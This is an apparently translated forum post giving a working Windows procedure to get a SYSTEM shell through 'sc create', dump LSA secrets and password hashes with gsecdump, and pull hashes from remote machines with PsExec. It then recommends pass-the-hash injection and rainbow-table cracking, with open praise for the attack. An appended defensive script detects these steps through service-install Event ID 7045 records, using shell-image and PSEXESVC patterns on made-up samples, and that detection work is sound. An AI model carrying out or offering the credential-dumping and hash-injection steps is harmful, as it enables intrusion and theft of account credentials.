To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the hash information just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; admins are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need to be cracked at all; it is just a matter of using the tool. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash it is 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I looked at the original source; it seems to be from /2007/03/16/. Depressing; what a gap.
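Seen from the administrator's side, both tricks in the post leave the same footprint: "sc create" on the box and PsExec's remote service both make Service Control Manager write a System-log Event ID 7045 ("A service was installed in the system") with the service name, image path and account. The script below is an added example, not code from the post or from the Truesec blog it quotes; it parses a few constructed 7045 records (made-up samples, not real exports) and flags a service whose image is an interactive shell, or whose name is PSEXESVC, PsExec's default service name. The dict shape of the events, the computer names and the benign "ContosoAgent" service are assumptions for the example; treating command.com and powershell.exe like cmd.exe is an assumed generalization beyond what the post shows.

```python
import re
from typing import Dict, List

# Service Control Manager writes System-log Event ID 7045 for every new
# service. The local "sc create shellcmdline ..." from the post and the
# service PsExec installs remotely both produce one.
SERVICE_INSTALLED_EVENT_ID = 7045

# Interactive shells that have no business being a service image.
# cmd.exe is what the post uses; command.com and powershell.exe are an
# assumed generalization for this example.
SHELL_IMAGE_RE = re.compile(r"(^|[\\/])(cmd\.exe|command\.com|powershell\.exe)\b")

# Default name of the service PsExec creates on the target host.
PSEXEC_SERVICE_NAMES = {"psexesvc"}

FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.MULTILINE,
)


def parse_7045(message: str) -> Dict[str, str]:
    """Pull the 'Key: value' fields out of a 7045 message body."""
    return {key: value.strip() for key, value in FIELD_RE.findall(message)}


def classify(event: Dict) -> List[str]:
    """Return the reasons an event looks suspicious (empty list = benign)."""
    if event.get("EventID") != SERVICE_INSTALLED_EVENT_ID:
        return []
    fields = parse_7045(event.get("Message", ""))
    name = fields.get("Service Name", "").lower()
    image = fields.get("Service File Name", "").lower()
    reasons = []
    if SHELL_IMAGE_RE.search(image):
        reasons.append("service image is an interactive shell")
    if name in PSEXEC_SERVICE_NAMES:
        reasons.append("PsExec remote service installed")
    # Most services run as LocalSystem, so this only adds weight once
    # something else already looks wrong.
    if reasons and fields.get("Service Account", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def scan_events(events: List[Dict]) -> List[Dict]:
    """Run classify() over a batch and return one alert per suspicious event."""
    alerts = []
    for event in events:
        reasons = classify(event)
        if reasons:
            fields = parse_7045(event["Message"])
            alerts.append({
                "computer": event.get("Computer", "?"),
                "service": fields.get("Service Name", ""),
                "image": fields.get("Service File Name", ""),
                "reasons": reasons,
            })
    return alerts


# Constructed sample records (not real log exports) in the shape of
# System-log 7045/7036 messages, mirroring what the post's commands leave behind.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WKS01", "Message":
        "A service was installed in the system.\n"
        "Service Name: shellcmdline\n"
        "Service File Name: C:\\WINDOWS\\system32\\cmd.exe /K start\n"
        "Service Type: user mode service\n"
        "Service Start Type: demand start\n"
        "Service Account: LocalSystem"},
    {"EventID": 7045, "Computer": "COMPUTER", "Message":
        "A service was installed in the system.\n"
        "Service Name: PSEXESVC\n"
        "Service File Name: %SystemRoot%\\PSEXESVC.exe\n"
        "Service Type: user mode service\n"
        "Service Start Type: demand start\n"
        "Service Account: LocalSystem"},
    {"EventID": 7045, "Computer": "WKS02", "Message":
        "A service was installed in the system.\n"
        "Service Name: ContosoAgent\n"
        "Service File Name: \"C:\\Program Files\\Contoso\\agent.exe\" --service\n"
        "Service Type: user mode service\n"
        "Service Start Type: auto start\n"
        "Service Account: LocalSystem"},
    {"EventID": 7036, "Computer": "WKS02", "Message":
        "The ContosoAgent service entered the running state."},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"{alert['computer']}: {alert['service']} ({alert['image']}) -> "
              f"{', '.join(alert['reasons'])}")
```

On current Windows versions the Security log carries the same fields in Event ID 4697 when the "Audit Security System Extension" subcategory is enabled, so the same parser applies there with a different event ID; the key signal in either log is the pairing of a new service with a shell image or the PSEXESVC name, not the LocalSystem account on its own.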